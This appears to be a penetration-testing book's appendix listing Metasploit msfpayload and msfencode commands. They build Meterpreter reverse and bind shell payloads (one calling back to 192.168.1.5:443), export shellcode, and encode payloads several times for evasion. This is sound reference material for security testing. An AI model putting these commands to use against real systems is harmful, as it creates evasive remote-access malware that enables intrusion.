Appendix B
MSFpayload Commands
msfpayload -h
    List available payloads.

msfpayload windows/meterpreter/bind_tcp O
    List the available options for the windows/meterpreter/bind_tcp payload
    (the commands in this appendix work with any payload).

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe
    Create a Meterpreter reverse_tcp payload that connects back to
    192.168.1.5 on port 443, and save it as a Windows Portable Executable
    named payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw
    Same as above, but export in raw format. This raw output is used later
    as input to msfencode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
    Same as above, but export as C-formatted shellcode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
    Export as %u-encoded JavaScript.
MSFencode Commands
msfencode -h
    Display the msfencode help.

msfencode -l
    List the available encoders.

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
    Select the output format in which the encoded buffer is displayed.

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
    Encode payload.raw with shikata_ga_nai five times and write the result
    to an output file named encoded_payload.exe.

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
    Create a multi-encoded payload: the raw payload is piped through
    x86/countdown five times, then through x86/shikata_ga_nai five times,
    and written out as an executable.

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
    Create pure alphanumeric shellcode in which ESI points to the shellcode;
    output in C-style notation.